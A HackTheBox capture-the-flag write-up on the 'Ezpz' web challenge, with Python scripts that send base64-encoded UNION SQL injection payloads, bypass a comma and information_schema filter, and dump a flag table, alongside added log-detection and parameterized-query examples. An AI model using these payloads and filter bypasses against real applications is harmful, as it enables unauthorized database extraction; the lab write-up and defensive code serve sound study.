HackTheBox Web Challenge Ezpz
This challenge was really amazing, as I got to learn about new errors and how to work around them.

We are given a website that immediately raises an error. The first error says "obj" does not exist, so it seems we need to pass a variable named "obj"; after supplying it, this first error disappears.
http://docker.hackthebox.eu:32299/?obj=a
The second error needs a little reading: it complains about the property 'ID' of a non-object, so it seems we need to provide an "ID" too, but one that lives inside "obj" rather than a separate parameter. Reading a little about PHP data types, I see we can pass object values as JSON ...
reference:
https://forum.getkirby.com/t/trying-to-get-property-of-non-object-error/3486
We can send something like {"ID": "1234"}, but it doesn't seem to go through; inspecting the page source there is a hint.
base64_encode($data): it looks like we have to base64-encode the payload first.
http://docker.hackthebox.eu:32299/?obj=eyJJRCI6ICIxMjM0In0=
Now there is no error, but there is no output either ... here I got stuck, trying a lot of things, and finally ... I found something with ' (a single quote): by changing the value of ID to ' we get another error.
A mysqli_fetch_assoc() error. Looks like we have to do SQLi. After some dabbling I finally found something. (From here on it is done via Python because ... converting to base64 by hand every time is exhausting .-.)
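The input channel here (a base64-encoded JSON object in the obj parameter, with the injection living in its ID field) is easy to miss in plain log review because the SQL never appears in clear text. As an added example, not part of the original write-up, the script below reverses that encoding over web-server access logs and flags ID values carrying SQL metacharacters or keywords. The log lines, the log format and the classification rules are constructed for this example.

```python
import base64
import binascii
import json
import re
from urllib.parse import parse_qs, quote, urlsplit

# Constructed access-log lines (not from the challenge). The second line's
# obj value is the base64 of a comma-free UNION payload, percent-encoded the
# way a web server would log it.
_UNION_OBJ = base64.b64encode(
    b'{"ID":"\'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b#"}'
).decode()
SAMPLE_LOG = (
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /?obj=eyJJRCI6ICIxMjM0In0= HTTP/1.1" 200 512\n'
    f'10.0.0.9 - - [01/Jan/2020:10:00:01 +0000] "GET /?obj={quote(_UNION_OBJ, safe="")} HTTP/1.1" 200 612\n'
    '10.0.0.7 - - [01/Jan/2020:10:00:02 +0000] "GET /?obj=not-base64! HTTP/1.1" 500 120\n'
)

# Common-log-format line: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Characters and keywords that have no business inside a numeric ID.
SQLI_RE = re.compile(r"(?i)'|\bunion\b|\bselect\b|information_schema|\bmysql\.")


def decode_obj(value):
    """Reverse the app's base64(JSON) encoding; return the dict or None if malformed."""
    try:
        raw = base64.b64decode(value, validate=True)
        data = json.loads(raw.decode("utf-8", errors="replace"))
    except (binascii.Error, ValueError):
        return None
    return data if isinstance(data, dict) else None


def classify(obj_value):
    """Verdict for one obj parameter value: benign, suspicious or malformed."""
    data = decode_obj(obj_value)
    if data is None:
        return "malformed"
    if SQLI_RE.search(str(data.get("ID", ""))):
        return "suspicious"
    return "benign"


def analyze_log(text):
    """Return one record per obj parameter seen in the log, with its verdict."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m["target"]).query)
        for obj_value in query.get("obj", []):
            records.append({"ip": m["ip"], "ts": m["ts"],
                            "verdict": classify(obj_value), "obj": obj_value})
    return records


if __name__ == "__main__":
    for r in analyze_log(SAMPLE_LOG):
        print(f'{r["ip"]:<10} {r["verdict"]:<10} {r["obj"]}')
```

Because parse_qs percent-decodes values, the `+`, `/` and `=` characters of base64 survive the round trip; decoding is done with validate=True so that junk in the parameter is reported as malformed rather than silently ignored.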
Python Code:

```python
import base64
import requests
from bs4 import BeautifulSoup as bs  # bs in the code is BeautifulSoup from the bs4 library

# seems like they block , (comma)
url = "http://docker.hackthebox.eu:32299/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT 1,2\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
print(flag.center.get_text())
```
We get the WAF error whenever a , (comma) is used.
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
Searching PayloadsAllTheThings, there is a comma bypass; using that ...
Python Code:

```python
import base64
import requests
from bs4 import BeautifulSoup as bs

# "2" seems to be printed (bypass comma)
url = "http://docker.hackthebox.eu:32299/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
print(flag.center.get_text())
```
You can see the output printed for the "2" column; first things first, find out the name of the database.
Python Code:

```python
import base64
import requests
from bs4 import BeautifulSoup as bs

# get database names
url = "http://docker.hackthebox.eu:32299/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT schema_name FROM information_schema.schemata)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
outputs = flag.find_all('h4')
for output in outputs:
    print(output.get_text())
```
There is a suspicious database 'ezpz'; next I want to find the table name.
Python Code:

```python
import base64
import requests
from bs4 import BeautifulSoup as bs

# blocked again by waf but...
url = "http://docker.hackthebox.eu:32299/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name FROM information_schema.tables)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
print(flag.center.get_text())
```
It looks like we're blocked again, but ...

Python Code:

```python
import base64
import requests
from bs4 import BeautifulSoup as bs

# this doesn't get blocked... so maybe information_schema.tables is blocked
url = "http://docker.hackthebox.eu:32299/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
print(flag.center.get_text())
```
Without information_schema.tables we get the usual mysqli error instead of the WAF block, so that string is what is being filtered. Looking again at PayloadsAllTheThings, there is a way to bypass information_schema.tables too.
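The lesson for whoever owns this kind of application is that a keyword blocklist (here: the comma and information_schema.tables) filters one spelling of the attack while leaving the actual defect, string interpolation into SQL, in place. As an added example, not code from the write-up or from the challenge, the script below puts the comma-free UNION shape from above against an in-memory SQLite table: the naive filter passes it, the interpolated query returns attacker-chosen rows, and the same value bound as a parameter is just a string that matches nothing. The table schema and the filter are constructed for the example; the comment marker is written as "--" because that is SQLite's syntax where the write-up's MySQL target uses "#".

```python
import sqlite3

# Constructed injection string in the comma-free UNION shape seen above.
# "--" is SQLite's comment syntax (MySQL also accepts "#").
INJECTED_ID = "' UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 'leaked')b --"


def make_db():
    """In-memory stand-in for the application database (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id TEXT, name TEXT)")
    conn.execute("INSERT INTO items VALUES ('1234', 'widget')")
    return conn


def naive_waf_blocks(item_id):
    """Blocklist in the spirit of the one the write-up hit: comma and information_schema.tables."""
    lowered = item_id.lower()
    return "," in lowered or "information_schema.tables" in lowered


def lookup_vulnerable(conn, item_id):
    """Interpolation: the ID becomes SQL grammar, so a UNION appends rows the query never intended."""
    return conn.execute(f"SELECT id, name FROM items WHERE id = '{item_id}'").fetchall()


def lookup_parameterized(conn, item_id):
    """Bound parameter: the ID is only ever a value compared against the column."""
    return conn.execute("SELECT id, name FROM items WHERE id = ?", (item_id,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print("blocklist stops payload:", naive_waf_blocks(INJECTED_ID))
    print("interpolated query:     ", lookup_vulnerable(conn, INJECTED_ID))
    print("parameterized query:    ", lookup_parameterized(conn, INJECTED_ID))
```

The parameterized lookup needs no filter at all: whatever the ID contains, the driver sends it as data, so the fix is in the query code rather than in front of it.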
Python Code:

```python
import base64
import requests
from bs4 import BeautifulSoup as bs

# get table names (bypass information_schema.tables)
url = "http://docker.hackthebox.eu:32299/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name FROM mysql.innodb_table_stats)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
outputs = flag.find_all('h4')
for output in outputs:
    print(output.get_text())
```
We get FlagTableUnguessableEzPZ as the table name. Now we only need to dump its contents.
Python Code:

```python
import base64
import requests
from bs4 import BeautifulSoup as bs

# final payload
url = "http://docker.hackthebox.eu:32299/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT * FROM ezpz.FlagTableUnguessableEzPZ)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
print(flag.h4.get_text())
```
Flag : HTB{*********************************}
Please share your comments, and if you enjoyed this blog post, share it with a friend! See you guys in the next post soon.